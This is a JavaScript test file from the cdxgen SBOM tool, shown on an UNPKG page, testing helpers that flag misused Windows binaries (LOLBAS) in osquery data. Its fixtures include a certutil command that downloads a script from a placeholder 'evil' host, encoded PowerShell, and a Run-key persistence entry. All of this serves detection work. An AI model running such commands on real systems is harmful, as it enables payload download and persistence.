UNPKG

@cyclonedx/cdxgen

Version:

Creates CycloneDX Software Bill of Materials (SBOM) from source or container image

github.com/cdxgen/cdxgen

cdxgen/cdxgen

63 lines (55 loc) 2.85 kB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
import { strict as assert } from "node:assert"; import { describe, it } from "poku"; import { createLolbasProperties, getLolbasMetadata } from "./lolbas.js"; describe("lolbas helpers", () => { it("resolves extensionless aliases to canonical LOLBAS executables", () => { const metadata = getLolbasMetadata("powershell"); assert.ok(metadata); assert.strictEqual(metadata.canonicalName, "powershell.exe"); assert.ok(metadata.functions.includes("script-execution")); assert.ok(metadata.attackTechniques.includes("T1059.001")); }); it("resolves fully qualified Windows paths", () => { const metadata = getLolbasMetadata("C:\\Windows\\System32\\regsvr32.exe"); assert.ok(metadata); assert.strictEqual(metadata.canonicalName, "regsvr32.exe"); assert.ok(metadata.riskTags.includes("proxy-execution")); }); it("creates aggregated properties for osquery rows with LOLBAS matches", () => { const properties = createLolbasProperties("windows_run_keys", { description: "powershell -enc AAAA; certutil.exe -urlcache -f https://evil/p.ps1 p.ps1", key: "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", }); const propertyMap = Object.fromEntries( properties.map((property) => [property.name, property.value]), ); assert.strictEqual(propertyMap["cdx:lolbas:matched"], "true"); assert.ok(propertyMap["cdx:lolbas:names"].includes("powershell.exe")); assert.ok(propertyMap["cdx:lolbas:names"].includes("certutil.exe")); assert.ok(propertyMap["cdx:lolbas:functions"].includes("download")); assert.ok(propertyMap["cdx:lolbas:attackTechniques"].includes("T1059.001")); assert.ok(propertyMap["cdx:lolbas:matchFields"].includes("description")); }); it("ignores benign Windows service descriptions that only mention LOLBAS tools", () => { const properties = createLolbasProperties("services_snapshot", { description: "This service can be queried via Powershell and configured with winrm.cmd.", display_name: "Windows Remote Management", module_path: "C:\\Windows\\System32\\WsmSvc.dll", path: "C:\\Windows\\System32\\svchost.exe -k NetworkService -p", }); assert.deepStrictEqual(properties, []); }); it("keeps Windows service path matches when the executable field itself is LOLBAS", () => { const properties = createLolbasProperties("services_snapshot", { path: "C:\\Users\\Public\\evil\\powershell.exe -enc AAAA", }); const propertyMap = Object.fromEntries( properties.map((property) => [property.name, property.value]), ); assert.strictEqual(propertyMap["cdx:lolbas:matched"], "true"); assert.ok(propertyMap["cdx:lolbas:names"].includes("powershell.exe")); assert.ok(propertyMap["cdx:lolbas:matchFields"].includes("path")); }); });